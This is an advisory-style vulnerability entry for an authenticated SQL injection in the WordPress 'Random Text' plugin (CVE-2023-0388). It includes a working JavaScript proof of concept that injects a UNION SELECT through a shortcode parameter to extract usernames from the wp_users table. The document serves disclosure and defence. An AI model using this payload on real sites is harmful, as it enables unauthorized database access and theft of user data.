Lucene search
Lana CodesWPVDB-ID:77861A2E-879A-4BD0-B4C0-CD19481ACE5DHistoryApr 03, 2023 - 12:00 a.m.
Random Text <= 0.3.0 - Subscriber+ SQLi
2023-04-0300:00:00
Lana Codes
wpscan.com
8
sql injection
subscriber
wordpress
EPSS
0.001
Percentile
28.5%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers.
PoC
fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=parse-media-shortcode&shortcode;=[randomtext category=“' UNION SELECT 1, user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users #”]’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
Related
prion
prion
Sql injection
2023-04-24 19:15:00
cve
cve
CVE-2023-0388
2023-04-24 19:15:08
cvelist
cvelist
CVE-2023-0388 Random Text <= 0.3.0 - Subscriber+ SQLi
2023-04-24 18:30:54
wpexploit
wpexploit
Random Text <= 0.3.0 - Subscriber+ SQLi
2023-04-03 00:00:00
nvd
nvd
CVE-2023-0388
2023-04-24 19:15:08
wordfence
wordfence